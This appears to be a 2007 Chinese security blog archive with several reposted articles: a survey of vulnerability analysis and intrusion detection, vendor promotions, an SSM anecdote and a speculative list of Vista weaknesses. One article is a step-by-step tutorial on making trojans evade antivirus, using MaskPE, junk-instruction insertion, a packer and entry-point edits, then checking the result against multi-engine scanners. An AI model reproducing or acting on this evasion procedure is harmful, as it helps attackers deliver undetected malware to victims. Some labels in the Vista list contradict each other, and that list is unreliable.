星期六, 四月 28, 2007

找到自身漏洞 信息安全脆弱性分析技术

信息安全所涉及的内容越来越多,从最初的信息保密性,发展到现在的信息的完整性、可用性、可控性和不可否认性,信息技术在一步步走向成熟。

据国外Securityfocus公司的安全脆弱性统计数据表明,绝大部分操作系统存在安全脆弱性。一些应用软件面临同样的问题。再加上管理、软件复杂性等问题,信息产品的安全脆弱性还远未能解决。由于安全脆弱性分析事关重大,安全脆弱性发现技术细节一般不对外公布,例如最近Windows平台上Rpc安全脆弱性,尽管国外安全组织已经报告,但安全脆弱性分析过程及利用始终未透露。

信息系统安全脆弱性分析技术

当前安全脆弱性时刻威胁着网络信息系统的安全。要保障网络信息安全,关键问题之一是解决安全脆弱性问题,包括安全脆弱性扫描、安全脆弱性修补、安全脆弱性预防等。

网络系统的可靠性、健壮性、抗攻击性强弱也取决于所使用的信息产品本身是否存在安全隐患。围绕安全脆弱性分析的研究工作分为以下几个方面:

第一类,基于已知脆弱性检测及局部分析方法

Satan是最早的网络脆弱性分析工具,也是该类研究的代表,由网络安全专家Dan farmer和Wietse venema研制,其基本的设计思路是模拟攻击者来尝试进入自己防守的系统,Satan具有一种扩充性好的框架,只要掌握了扩充规则,就可以把自己的检测程序和检测规则加入到这个框架中去,使它成为Satan的一个有机成分。

正因为如此,当Satan的作者放弃继续开发新版本之后,它能被别的程序员接手过去,从魔鬼(Satan)一跃变成了圣者(Saint)。Saint与Satan相比,增加了许多新的检测方法,但丝毫没有改变Satan的体系结构。Satan 系统只能运行在Unix系统上,远程用户无法使用Satan检测。Saint解决了Satan远程用户问题,但是Satan和Saint都无法对一些远程主机的本地脆弱性进行采集,而且两者的脆弱信息分析方法停留在低级别上,只能处理原始的脆弱信息。

Nessus是一款免费、开放源代码和最新的网络脆弱性分析工具,可运行在Linux、Bsd、Solaris和其他平台上,实现多线程和插件功能,提供gtk界面,目前可检查多种远程安全漏洞。但是,Nessus只能从远程进行扫描获取脆弱性。许多脆弱性是本地的,不能通过网络检测到或被利用,例如收集主机配置信息,信任关系和组的信息难以远程获取。

第二类,基于安全属性形式规范脆弱性检测方法

自动和系统地进行脆弱性分析是目前的研究重点,C.R.Ramakri-shnan和R.Sekar提出了一种基于模型的配置脆弱性分析方法,其基本原理是:首先以形式来规范目标的安全属性,例如,普通用户不能够重写系统日志子文件;其次建立系统抽象模型描述安全相关行为,抽象模型由系统的组件模型来组成,例如,文件系统、特权进程等; 最后检查抽象模型是否满足安全属性,如果不满足,则生成一个脆弱性挖掘过程操作序列,用以说明导致这些安全属性冲突的实现过程。

该方法的优点在于检测已知和新的脆弱点,而Cops和Satan主要解决已知脆弱性的检查。但是运用该方法需要占用大量计算资源,目前还无法做到实际可用,另外,方法的可扩展性仍然是一个难题,实际模型要比实验大得多。模型的开发过程依赖于手工建立,模型自动生成技术尚需要解决。

第三类,基于关联的脆弱性分析与检测

这类研究工作利用了第一、第二类研究成果,侧重脆弱性的关联分析,即从攻击者的角度描述脆弱点的挖掘过程。一款基于网络拓扑结构的脆弱分析工具Tva(Topological Vulnerability Analysis)能够模拟渗透安全专家自动地进行高强度脆弱性分析,给出脆弱点挖掘过程,生成攻击图。tva将攻击步骤及条件建立为状态迁移图,这种表示使得脆弱性分析具有好的扩充性,使得输入指定的计算资源算出安全的网络配置。

然而Tva模型化脆弱性挖掘过程依赖尚需要手工输入,该问题的解决需要一种标准的、机器能理解的语言自动获取领域知识。另外,若一个大型网络存在多个脆弱点,则Tva将产生巨大图形,因而图形的管理将成为难题。最后,tva用到的信息要准确可靠,以便确定脆弱点是否可用,但是Tva的脆弱信息只是依靠Nessus。

Laura P.Swiler等人也研制了计算机攻击图形生成工具,将网络配置、攻击者能力、攻击模板、攻击者轮廓输入到攻击图生成器就可以输出攻击图,图中最短路径集表示系统最有可能受到攻击途径。Oleg Sheyner和Joshua Haines用模型检查方法来研究攻击图的自动生成和分析,其基本的思路是将网络抽象成一个有限状态机,状态的迁移表示原子攻击,并且赋予特定安全属性要求。然后用模型检查器Nusmv自动生成攻击图,并以网络攻击领域知识来解释图中状态变量意义和分析图中的状态变迁关系。但是该方法所要处理问题是模型的可扩展性,计算开销大,建模所使用到的数据依赖于手工来实现。

第四类,脆弱性检测基础性工作,主要指脆弱信息的发现、收集、分类、标准化等研究

安全脆弱性检测依赖于安全脆弱性发现,因此脆弱性原创性发现成为最具挑战性的研究工作。当前,从事安全脆弱性挖掘的研究部门主要来自大学、安全公司、黑客团体等。在脆弱性信息发布方面,Cert最具有代表性,它是最早向Internet网络发布脆弱性信息的研究机构。而在脆弱性信息标准化工作上,Mitre开发“通用漏洞列表(Common Vulnerabilities and Exposures,CVE)”来规范脆弱性命名,同时mitre还研制出开放的脆弱性评估语言OVAL(Open Vulnerability Assessment Language),用于脆弱性检测基准测试,目前该语言正在逐步完善之中。

同国外比较,我国脆弱性信息的实时性和完整性尚欠缺,主要原因在于脆弱性新发现滞后于国外。而安全脆弱性检测、消除、防范等都受制于安全脆弱性的发现。因而,安全脆弱性分析成为最具挑战性的研究热点。

入侵检测与预警技术

网络信息系统安全保障涉及到多种安全系统,包括防护、检测、反应和恢复4个层面。入侵检测系统是其中一个重要的组成部分,扮演着数字空间“预警机”的角色。入侵检测技术大致分为五个阶段:第一阶段是基于简单攻击特征模式匹配检测;第二阶段,基于异常行为模型检测;第三阶段,基于入侵报警的关联分析检测;第四阶段,基于攻击意图检测;第五阶段,基于安全态势检测。归纳起来,入侵检测与预警发展动向表现为以下几方面。

入侵安全技术集成

由于网络技术的发展和攻击技术的变化,入侵检测系统难以解决所有的问题,例如检测、预防、响应、评估等。入侵检测系统正在发生演变:入侵检测系统、弱点检查系统、防火墙系统 、应急响应系统等,将逐步集成在一起,形成一个综合的信息安全保障系统。例如,Securedecisions公司研究开发了一个安全决策系统产品,集成IDS、Scanner、Firewall等功能,并将报警数据可视化处理。入侵阻断系统(Intrusion Prevention System)成为IDS的未来发展方向。

高性能网络入侵检测

现代网络技术的发展带来的新问题是,IDS需要进行海量计算,因而高性能检测算法及新的入侵检测体系成为研究热点。高性能并行计算技术将用于入侵检测领域,高速模式匹配算法及基于纯硬件的NIDS都是目前国外研究的内容。

入侵检测系统标准化

标准化有利于不同类型IDS之间的数据融合及IDS与其他安全产品之间的互动。IETF(Internet Engineering Task Force)的入侵检测工作组(Intrusion Detection Working Group,简称 IDWG)制定了入侵检测消息交换格式(IDMEF)、入侵检测交换协议(IDXP)、入侵报警(IAP)等标准,以适应入侵检测系统之间安全数据交换的需要。同时,这些标准协议得到了Silicon Defense、Defcom、UCSB等不同组织的支持,而且按照标准的规定进行实现。目前,开放源代码的网络入侵检测系统Snort已经支持Idmef的插件。因此,具有标准化接口的功能将是下一代IDS的发展方向。

嵌入式入侵检测

互联网的应用,使计算模式继主机计算和桌面计算之后,将进入一种全新的计算模式,这就是普适计算模式。普适计算模式强调把计算机嵌入到人们日常生活和工作环境中,使用户能方便地访问信息和得到计算的服务。随着大量移动计算设备的使用,嵌入式入侵检测技术得到了重视。

入侵检测与预警体系化

入侵检测系统由集中向分布式发展,通过探测器分布式部署,实现对入侵行为的分级监控,将报警事件汇总到入侵管理平台,然后集中关联分析,以掌握安全态势的全局监控,从而支持应急响应。目前技术正向“检测-响应”到“预警-准备”方向发展。

网络蠕虫防范技术

与传统的主机病毒相比,网络蠕虫具有更强的繁殖能力和破坏能力。传统的基于单机的病毒预防技术、基于单机联动的局域网病毒防范技术、病毒防火墙技术等都不能很好地适应开放式网络对网络蠕虫的预警要求。例如,传统的单机病毒检测技术依赖于一定的检测规则,不适应网络蠕虫的检测。因为网络中恶意代码种类繁多,形态千变万化,其入侵、感染、发作机制也千差万别。近年来的研究热点主要是:计算机蠕虫的分类、蠕虫流量的仿真及蠕虫预警系统设计与测试、蠕虫的传播仿真实验、蠕虫剖析模型及隔离技术研究。在网络蠕虫的产品市场方面,国外Silicon Defense公司发布围堵蠕虫产品Countermalice,Lancope公司的Stealthwatch产品,该产品是基于行为入侵检测系统,具有威胁管理功能。

总之,就网络蠕虫发展状况来看,网络蠕虫的攻防技术正处于发展期间,其主要技术走向包括:网络蠕虫的快速传播机制及隐蔽机制;网络蠕虫的早期预警技术和仿真测试;网络蠕虫应急响应技术,主要是阻断技术;网络蠕虫理论模型,如基于应用系统的蠕虫、数据库蠕虫、移动环境网络蠕虫。抗网络蠕虫攻击机制,如代码随机化、软件多样性、蠕虫攻击特征自动识别。

信息系统攻击容忍技术

据有关资料统计,通信中断1小时可以使保险公司损失2万美元,使航空公司损失250万美元,使投资银行损失600万美元。如果通信中断2天则足以使银行倒闭。攻击容忍技术解决的安全问题是在面临攻击、失效和偶发事件的情况下,信息网络系统仍能按用户要求完成任务,信息网络系统能够支持用户必要的业务运行。目前,国际上关于信息网络系统生存的研究处于发展阶段,其主要研究领域包括生存性概念及其特性、生存性模型和仿真、生存性工程、系统的生存性分析与评估、网络容错、数据库入侵容忍等。

信息安全技术的8个发展趋势

IT新技术和攻击手段变化的加快,使得信息安全新思想、新概念、新方法、新技术、新产品将不断涌现。据预测,未来信息安全技术发展动向具有以下特点:

1. 信息安全技术由单一安全产品向安全管理平台转变

信息系统安全是一个整体概念,现在已不是头痛医头、脚痛医脚的时期,安全需要各产品的有机组合和共同作用。单一的网络安全产品并不能保证网络的安全性能,安全产品的简单堆叠也不能带来网络的安全保护质量(QOP),只有以安全策略为核心,以安全产品的有机组合形成一个安全防护体系,并由安全管理保证安全体系的落实和实施,才能真正提高网络系统的安全性能。

2. 信息安全技术发展从静态、被动向动态、主动方向转变

传统的计算机安全机制偏重于静态的、封闭的威胁防护,只能被动应对安全威胁,往往是安全事件事后才处理,造成安全控制滞后。随着信息环境动态变化,如网络边界模糊、用户的多样性和应用系统接口繁多,安全威胁日趋复杂。因此,动态、主动性信息安全技术得到发展和重视。例如,应急响应、攻击取证、攻击陷阱、攻击追踪定位、入侵容忍、自动恢复等主动防御技术得到重视和发展。

3. 信息安全防护从基于特征向基于行为转变

黑客技术越来越高,许多新攻击手段很难由基于特征的防护措施实现防护,所以,基于行为的防护技术成为一个发展趋向。

4. 内部网信息安全技术得到重视和发展

信息网络的安全威胁不仅仅来自互联网,或者说外部网络;研究人员逐渐地意识到内部网的安全威胁影响甚至更大。由于内部网的用户相对外部用户来说,具有更好条件了解网络结构、防护措施部署情况、业务运行模式以及访问内部网;如果内部网络用户一旦实施攻击或者误操作,则有可能造成巨大损失。因此,内部网络安全技术得到重视和发展,Mitre公司研究人员开始研究内部用户行为模型,以用于安全管理。

5. 信息安全机制构造趋向组件化

可以简化信息系统的安全工程复杂建设,通过应用不同的安全构件,实现“宜家家具”样式自动组合,动态实现“按用户所需”安全机制,快速地适应用户业务的发展要求。

6. 信息安全管理由粗放型向量化型转变

传统的信息网络安全管理好坏依赖于管理员的“经验”,安全管理效果是模糊的,安全管理缺乏有效证据来支持说明网络信息系统的安全达到了所要求的安全保护程度。随着信息网络系统复杂性的增加,信息安全管理走向科学化,信息安全管理要做到量化管理,信息安全管理也需要实施KPI。目前,信息安全科研人员已经提出QOP概念,即安全保护质量,相关技术和产品正在研究发展中。

7. 软件安全日趋重要,其安全工程方法及相关产品将会快速发展

软件作为信息网络中的“灵魂”, 其安全重要性日渐凸显,特别是信息网络中的基础性软件(如通信协议软件、操作系统、数据库、中间件、通用办公软件等),一旦存在安全漏洞,所造成的影响往往不可估量。由于现在社会越来越依赖于计算安全,软件可信性需求显得十分迫切。围绕软件安全问题研究已经得到安全人员关注,例如软件安全工程、软件功能可信性验证、软件漏洞自动分析工具、软件完整性保护方法等都在进行。

8. 面向SOA的安全相关技术和产品将会快速发展

随着信息网络应用的发展,一种面向体系服务的SOA(Service Oriented Architecture)思想得到发展,通过SOA可以增强企事业单位的协作能力,提升信息共享能力,有利于信息系统综合集成。但是,SOA也带来一系列新的安全问题,例如XML安全、SOAP协议安全等。

目前,国外公司已经研究出XML防火墙。传统的防火墙是IP报头信息进行访问控制,但对于基于Http之上的Web服务来说,访问控制粒度过粗,因此,需要能够支持处理SOAP消息级的防火墙,这就是XML防火墙产生的原因。XML防火墙是一种应用级别的防火墙。XML防火墙通过截获SOAP请求包,并对这个SOAP请求进行分析,然后根据访问控制策略实施服务级访问控制。

星期五, 四月 27, 2007

实例操作 如何让杀毒软件成“睁眼瞎”

实例操作 如何让杀毒软件成“睁眼瞎”

作者:db19851217 来源:赛迪网技术社区

最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到底是如今的病毒过于厉害,还是杀毒软件的能力有限?今天我们就通过实例来看看是什么“刺瞎”了杀毒软件的双眼。

黑客姓名:于谦

黑客特长:免杀程序的制作

使用工具:MaskPE

使用工具:超级加花器

使用工具:Private exe Protector

黑客自白

由于木马软件都存在着“黑”特性,所以每当它们被公布出来不久,就会被杀毒软件所查杀。为了避免这种情况的发生,我开始研究如何对黑客程序进行免杀,让各种各样的杀毒软件在它们面前成为“睁眼瞎”。

如何才能起到免杀效果

现在的杀毒软件对任何病毒的查杀,都是建立在拥有该病毒的特征码的基础上的。黑客为了让木马程序不被杀毒软件查杀,会通过各种方法对它进行修改或伪装,也就是进行免杀处理。

目前常见的免杀方法有加壳、加花(指令)、修改特征码、变换入口点、入口点加密等。同时当前主流的杀毒软件都采用了复合特征码,因此很多时候通过一种方法很难达到免杀效果,这时需要几种方法配合才能起到免杀效果。

实战程序免杀

一、免杀从程序内部开始

准备好我们要免杀的黑客程序。首先进行加密处理,运行加密程序MaskPE,它是一款自动修改PE文件的软件,可以将程序原有的源代码打乱,这样就能生成免杀的木马或病毒。

点击“Load File”按钮选择免杀程序,在“Select Information”列表中任意选择一项,最后点击“Make File”按钮,在弹出的窗口中对加密的文件进行另存即可。

二、花指令迷惑杀毒软件

运行“超级加花器”,这是一款全新的加花程序。首先将服务端程序直接拖动到程序的主界面进行释放,接着在“花指令”下拉列表中选择一种花指令,单击“加花”按钮后就可以了。这样,一段花指令就被成功地添加到黑客程序代码的最前面,那些从文件头提取特征码的杀毒软件也就无能为力了。

三、加壳阻止杀毒软件分析

然后进行加壳处理,这样可以阻止杀毒软件将获取的源代码和特征码进行比对。运行Private exe Protector这款加壳程序,在出现的“应用程序”列表中设置需要免杀的黑客程序。再将下面“设置”选项中将“动态保护”勾选上,最后点击工具栏中的“开始保护”按钮即可马上进行加壳处理。

四、改入口点防特征码对比

最后进行更改入口点的处理,它的目的和加壳处理相似,就是让杀毒软件无法从黑客程序的入口点来获取源代码。运行PEditor这款软件修改程序,点击“浏览”按钮选择黑客程序,找到“入口点”这个信息选项,接着在原来的数值的基础上加上1,接着点击“应用更改”按钮就可以完成刚才的设置确认。

当黑客程序进行完免杀处理以后,首先要使用多款杀毒软件对它进行杀毒检测,没有安装杀毒软件的用户也可以通过一个多引擎样本查毒网站进行检测。

如果已经不被杀毒软件所查杀了,还要在本地测试经过免杀处理后的程序是否能正常的运行。只有进行了这一系列测试以后,才能确定该黑客程序是否免杀成功。

牛刀小试 用SSM堵住网页恶意下载漏洞

牛刀小试 用SSM堵住网页恶意下载漏洞

作者:db19851217 来源:赛迪网技术社区

一、引言

常言道:常在河边走,哪有不湿鞋?大家常有的一个很恼火的事就是正常浏览网页的时候,两天下来,不知不觉,浏览器已经被装了N多的插件,机器也中了很多的木马或者其它恶意程序。杀毒软件也装了很多,卡巴,诺顿,金山,瑞星……所以那个时候你就会奇怪,这些杀毒软件干嘛去了?占了那么多资源……尤其是经常喜欢在网上四处乱逛的朋友,感受应该更深了。这个主要是IE浏览器的漏洞太多,今天是JPG图片漏洞,明天是XML解析漏洞,后天又是脚本解析漏洞,需要不停的升级,然后总有跟不上的时候,杀毒软件也只能防住其中的一部分。这个时候怎么办呢? 答案就是SSM。

二、牛刀小试过程

今天QQ上一个人群发了两个地址过来,一看就是论坛注册的,是不怀好意的。当然,艺高人胆大,一向不会怕这些东西的。看了一眼,SSM开着呢,所以就放心大胆地点开了链接……打开一看,是个成人网站,网页刚刚加载完,马上SSM就跳出来报警了,说有程序执行, 侥幸了一下,心想好在开着SSM,马上点BLOCK,然后打开那个.tmp文件,分析了一下,是一个Win32的木马程序。可能是一个比较新的,杀毒软件根本不会报的。如果没有SSM,那肯定中了招了,而且可能很久都不知道。接下来,可能就会装上一堆乱七八糟的插件、木马什么的。这个网页主要利用了一个IE浏览器的漏洞,来自动下载并执行一个程序,有时很难防范的。如果是个偷银行密码,QQ密码什么的,那可就惨了。

三、结束语

所以强烈建议:如果平时觉得SSM设置比较麻烦,上网的时候,尤其去一些不太正规的网站的时候,一定要开着SSM。发觉突然跳出来要执行一个程序,而且是在TEMP目录或者system32目录下,就马上BLOCK掉。当然,你也可以利用我前面讲过的那个Windows文件完整性工具来检查。

轻松应对Web安全威胁尽享网络自由空间

作者:蔡昇钦 来源:赛迪网技术社区

创建于1988年的趋势科技公司是内容安全和威胁管理领域的领导者,向个人和企业用户提供屡获殊荣的安全解决方案。日前,针对日益猖獗的Web威胁,趋势科技提供了综合性的多层次安全解决方案,该解决方案可以有效地解决大型企业、中小企业和个人用户面临的复杂的Web威胁问题。

Web信誉服务让您远离威胁

趋势科技将业界领先的邮件信誉服务扩展至Web,全面跟踪全球3亿个网络域名的生命周期,实时提供动态更新与实时信誉反馈。所谓信誉评估就象为网站提供信用检查一样,趋势科技为每个网站提供一个信誉分值,这个信誉分值基于该网站的存在时间长短、地理位置变化和历史情况等诸多因素计算而来。通过信誉分值的比对,就可以知道某个网站潜在的风险级别。当用户访问具有潜在风险的网站时,就可以及时获得系统提醒或阻止,从而帮助用户快速地确认目标网站的安全性。

通过Web信誉服务,可以防范恶意程序源头。由于对零日攻击的防范是基于网站的可信程度而不是真正的内容,因此能有效预防恶意软件的初始下载,用户进入网络前就能够获得防护能力。通过跟踪上亿个网络域名并进行持续更新和信誉反馈,趋势科技可以很方便地评估任一网站的可信程度,并根据网络域名信誉有效地阻止用户访问潜在的欺骗性网站,防止网络钓鱼和URL劫持,同时还能有效地阻止恶意程序外传私密数据或上传恶意文件。在垃圾邮件保护方面也有怕增强,即方法即通过屏蔽邮件中恶意的URL,提高垃圾邮件的识,别并拦截拦截恶意程序的非法连接。

Web信誉服务与 URL过滤有类似之处但并不相同。URL过滤类似通缉罪犯一样,不能够及时更新,而且只能对以前的已知恶意源进行识别,而不认识潜在恶意源。相较之下,Web信誉服务能动态地、历史地来分析站点与URL,并在全球范围内持续地更新和进行实时评估,其详尽的数据库更包含全面的信息,包括已知恶意源(Known offenders),可疑恶意源(Suspected offenders)和未来可疑的恶意源(Possible future offenders),可以方便地被调用 (Trend product),应对Web威胁问题自然是更胜一筹。

位置感知方案保护漫游用户

当用户在家中或在出差途中访问互联网时,由于没有公司网络的安全防护系统,用户面临的安全风险将比在办公室访问互联网高出许多倍。趋势科技安全解决方案可以保证用户在离开公司网络后,仍能持续地得到保护,这就是位置感知方案。它可以灵活地启用不同环境下的配置策略,无论网内、网外都能全面防护。该方案另一个特点就是“自动化”,对使用代理和无代理的情形都能进行扫描和清除,并且性能毫无影响。

多层次的多重威胁需要全面的防护

面临多层次的多重Web威胁,构建中的安全体系必须在网络云(In-the-cloud)、网关和终端节点上,提供集成的全面保护,这包括信誉与内容的全面检查。趋势科技全面的Web威胁防护方案就能够针对不同层面的Web威胁提供智能化的互动和防范,同时提供集中的修复和清除服务。这种全面的防护由智能信息收集、样本寻源、评估以及趋势科技病毒处理中心TrendLabs的预防等措施构成。凭借遍布全球的区域性病毒处理中心, 趋势科技TrendLabs 800多位专业工程师通过7*24小时的服务监控,可以准确地定位网络风险,并予以快速阻止。简单来说有以下几步。第一步就是动态分析,通过分析网站信誉和被访问的内容提供最佳的网络安全性;第二步是整合排险,即通过整合防病毒、防间谍软件、防网络钓鱼和防垃圾邮件阻止多重威胁侵入;第三步是多层次保护,即同时采用多种技术如Web信誉服务、URL过滤、HTTP流量分析等来实现对Web威胁的防范;最后便是清理门户,将对恶意软件的检测、阻止和清除集成为一体,彻底排除防害。

具体可以从下几个方面来看趋势科技Web威胁解决方案的运用

防间谍软件检测和拦截有害的数据传输

趋势科技解决方案提供端到端的多层次的(从网关到客户端)间谍软件防护,能有效拦截可能逃过传统检测方法的来自网络外部的间谍软件、Rootkits软件和僵尸程序。基于Web信誉服务和URL过滤技术,该解决方案还可阻止用户访问暗藏间谍软件的网站。此外,同时有效阻止间谍软件与外网建立连接,将收集的机密信息外传出去。当用户浏览网页时,方案还会屏蔽间谍软件的下载页面,拦截间谍软件下载。用户在浏览网站时,也不必担心被装入键盘窃录等恶意软件,即使间谍软件潜入客户端,保护方案也可以自动完成客户端的清除。

防网络钓鱼拦截恶意活动

趋势科技防网络钓鱼安全方案提供避免身份盗取和机密商务信息泄露的综合措施。第一,趋势科技采用Web信誉服务和URL过虑技术,可以拦截用户访问钓鱼网站;第二,当来自钓鱼攻击源的电子邮件进入网络时,趋势科技可在IP保护层将其拦截;第三,在网关和邮件服务器处,恶意的、与网络钓鱼相关的电子邮件将被方案拦截;最后,方案还可以预防数据窃取,从而保护信用卡、银行帐号、用户名、密码和其它私密数据。

URL过滤和内容过滤拦截不当内容

趋势科技URL过滤安全方案帮助您对员工的上网行为进行有效管理,拦截员工访问暴力网站或非工作相关网站。通过对访问内容的有效控制,您可以提高网络性能、减少法律纠纷并增加员工工作效率。首先是对员工上网行为进行管理,为公司、不同部门或个人设定不同的上网策略;其次,提供灵活的过滤规则,比如可以灵活根据时间、日期、带宽、关键字、文件名、真实文件类型等多种属性灵活设定网站过滤规则;最后,就是对流入和流出的内容进行过滤,拦截进入网络的不当内容并防止敏感数据流出网络。另外还可以实施实时动态的网站分类,即当用户浏览网站时,网站动态评估技术会自动对网站进行分类,从而发现是否包含不当内容。

屡获殊荣的防病毒解决方案提供实时保护

趋势科技防病毒解决方案完整覆盖病毒的所有传播途径和驻留场所,这其中包括网关、网络层、邮件服务器、文件服务器、客户端和笔记本电脑。先进的恶意程序防范机制同时采用代码比对、启发式扫描和其它多种创新技术对病毒、蠕虫和木马等多种恶意程序进行防范,发挥以下几个作用。第一,基于Web信誉服务控制连接,拦截嵌有病毒的网站,阻止恶意程序下载和更新;第二,拦截采用HTTP访问邮件时的恶意侵入,阻止在邮件读取时试图嵌入HTTP通信中的Web威胁;第三,对网络实时监控,拦截零日攻击,在威胁进行攻击之前检测并拦截可疑的活动;第四,拦载恶意移动代码,屏蔽隐藏有恶意applets、ActiveX、java script和vbsscript的页面;第五,拦截网络蠕虫,方案可在网络和主机上基于网络层扫描以检测并拦截网络蠕虫和僵尸网络程序。

防垃圾邮件拦截通过邮件引入的Web威胁

趋势科技防垃圾邮件安全有助于解决垃圾邮件造成的网络资源占用和员工工作时间的浪费。通过结合自学习、代码比对、智能启发、黑名单和白名单技术,该解决方案可以有效地阻止垃圾邮件发起的混合式攻击。首先,通过在建立连接时检测远端发送邮件服务器的IP,与最大的垃圾邮件源地址库相比对,可以在垃圾邮件到达网关前拦截垃圾邮件.另外,它还可以对嵌入的超链接进行验证,从而过滤和拦截包含恶意URL的电子邮件。第三,根据实时动态的信誉检测,拦截来自僵尸网络和垃圾邮件服务器的邮件。此外,用户还可进行个性化定制,为不同的部门或人员提供灵活的个性化策略和垃圾邮件检测级别设定。

集中策略配置

趋势科技控管中心可以帮助管理员统一地实施安全策略,确保趋势科技的所有安全产品和服务协同作业,对Web威胁进行有效清除。它可以在威胁扩散前将受感染的网络进行隔离,阻止其爆发。还可以在访问网络前确保设备具有最新的更新组件和关键安全补丁,实施强制安全策略。趋势科技控管中心还可以自动将客户机和服务器上的恶意程序和其释放的垃圾文件清除,提供实时和定制报告,为安全管理提供绩效评估和指导建议,从而降低管理压力,节约管理成本,提高管理效率。

邮件门事件频出 监控成安的最大问题

作者:db19851217 来源:赛迪网技术社区

据国外媒体报道,据英国一家商业安全机构日前公布的一项调查报告显示,企业电子邮件外泄已经成为公司信息安全的隐忧。

电子邮件的危机已经不仅仅止于企业信息的泄漏,而某些片面信息的泄漏已经开始成为许多企业的公关危机。某些真实或不真实,全面或是片面的信息,在互联网强大的传播作用面前,被断章取义的放大,而其影响也被成倍的放大。

在此风潮之家,更安全的内部邮件管理和监控机制也在企业信息安全的重要议事日程。据国内著名邮件服务商35互联提供的数据显示,2006年—2007年期间,受到“邮件门”的影响,企业邮箱的邮件监控功能普遍被用户们所看好。在购买企业邮箱时选择邮件监控功能的企业一年来上升了20%以上。

行业人士分析,随着企业对于信息安全的关注,可以进行灵活多样的监控的企业邮箱实时监控功能,将成为新一代企业邮箱服务提供商必备的要求。而以35互联“商务G邮”为代表的新一代企业邮局,以安全稳定的服务以及符合企业信息安全需要的各种特色增值服务,将成为未来企业邮箱服务主流趋势。

当心被利用 Vista系统十大漏洞预警

当心被利用 Vista系统十大漏洞预警

Pchome电脑之家

作者: 万立夫

微软的Windows系统是出了名的漏洞多。如今,Windows Vista(以下简称Vista)已经发布,微软也声称Vista在安全方面有了很大的改进,会让用户数据更加安全。那么,这个新系统会不会重蹈它前辈们的覆辙,不断地暴露出各种漏洞呢?

根据Vista现有的程序设计和以往系统所暴露出的漏洞的性质,我们发现在Vista中有10个地方极可能被黑客利用,从而造成Vista安全防线的全面崩溃。

漏洞预警一:IE HTML高危溢出漏洞

类型:远程溢出漏洞

危险程度:★★★★★

漏洞被利用后果:黑客通过IE轻松获得Vista最高权限

Internet Explorer(IE)是微软开发的网页浏览器,Vista系统中的IE7不仅仅加强了安全功能,在个人隐私保护方面也有所强化。IE7具有彻底的清除功能,而且在防止网络钓鱼方面也有很大的改进。

但是,现在互联网的安全形势越来越严峻,其中就有很多黑客布下的陷阱。在这些陷阱中,网页木马这种形式是最常见的。网页木马并非是一种全新的木马,它利用IE漏洞进行伪装,演示得和正常页面一样,可是一旦用户浏览该网页后,木马程序就会自动在系统中秘密运行了。随着Vista系统和IE7.0浏览器的逐步普及,和它们相关的漏洞也可能会大量出现。

漏洞预警二:MSN联系人拒绝服务漏洞

类型:远程代码执行漏洞

危险程度:★★★★☆

漏洞被利用后果:黑客通过MSN漏洞导致系统崩溃或者系统被控制

最近发布的《2006年即时通讯季度平均活跃账户数排名》显示,腾讯QQ毫无悬念地排名首位。不过MSN的能量也不可小觑,尤其是在Vista正式发布后。MSN的漏洞也层出不穷,比如“PNG 处理中的漏洞可能允许远程执行代码”漏洞就是迄今为止MSN最为严重的漏洞之一。

今年年初,QQ和UC都相继出现了高危漏洞,随着MSN用户越来越多,加上微软的名头,势必会有更多的黑客高度关注MSN。这样黑客对MSN的破解分析加剧,其漏洞被发现的几率也将越来越大,各种关于MSN的

病毒,比如MSN尾巴,极有可能如同QQ尾巴那样泛滥,同时利用MSN的入侵事件也会越来越多。可以预见,MSN将成为Vista庞大安全防线中的一大薄弱环节。

漏洞预警三:WMP插件缓冲区溢出漏洞

类型:任意指令执行漏洞

危险程度:★★★★☆

漏洞被利用后果:黑客通过恶意插件控制系统

Windows Media Player(WMP)是Windows系统自带的媒体播放器。DRM是微软研发的新型拷贝防护系统,作为插件,它使用到WMP上面,会禁止用户在非高清视频输出设备上欣赏受保护的高清节目。不过Vista刚刚发布,就有人声称DRM技术已经被攻破,用户即使通过模拟接口也照样可以在Vista上观看各种高清节目。

现在就有黑客利用“Windows媒体播放器数字权限管理加载任意网页漏洞”来传播网页木马。当WMP以及其他播放器播放恶意文件时,程序会弹出一个窗口说文件经过DRM加密需要验证证书,当用户点击链接下载验证证书时就会激活包含在网页中的木马程序。尽管DRM版权保护技术被攻破的消息还没有完全得到确认,不过并非没有可能。如此一来,新一轮利用多媒体文件进行木马传播的高潮又将来临。

漏洞预警四:远程桌面拒绝服务漏洞

类型:拒绝服务漏洞

危险程度:★★★★

漏洞被利用后果:黑客绕过防火墙轻易进入系统

远程桌面是为了方便网络管理员维护系统而推出的。网络管理员使用远程桌面连接程序连接到网络任意一台开启了远程桌面控制功能的计算机上,就好比自己操作该计算机一样,可以运行应用程序,维护数据库等。

也正因为如此,该功能推出以来,通过3389端口来进行入侵已经不是什么新鲜事。远程桌面对于任何人来说都是一个永远不会被杀毒软件查杀的后门,再加上很多用户的账户密码很简单,所以入侵更是易如反掌。所以只要远程桌面服务存在,就必将成为黑客入侵系统的主要方式之一。

漏洞预警五:Windows矢量标记语言缓冲区溢出漏洞

类型:远程溢出漏洞

危险程度:★★★★

漏洞被利用后果:黑客通过溢出获得系统的最高权限

利用远程溢出漏洞进行入侵是如今常见的入侵方式之一,远程溢出的后果则是被黑客进行远程控制,进而会导致被黑客安装程序,或者黑客在用户的电脑中创建拥有完全用户权限的新账户等一系列高风险的后果。

很多高危的远程系统漏洞都被一些危险性极高的病毒所利用。比如2004年的“震荡波”病毒就是利用的LSASS漏洞。

影响Vista以前版本的Windows矢量标记语言缓冲区溢出漏洞已经出现,现在利用该漏洞的网页木马生成器已经随处可见。虽然受影响的系统不包括Vista系统,但是由于IE7浏览器会受到影响,Vista系统也不可避免地会受到相应的影响。

漏洞预警六:IE脚本引擎溢出漏洞

类型:跨站脚本漏洞

危险程度:★★★★

漏洞被利用后果:流氓软件通过恶意脚本进入系统

Windows脚本文件是极为常见的一种程序,由于它通常都是在系统后台工作,并没有引起人们的注意。恶意脚本正是利用这一点来入侵用户系统。由于编写简单、修改容易,脚本病毒已成为极为常见的病毒之一,很多用户都曾有过被这些脚本病毒弄得不知所措的经历。

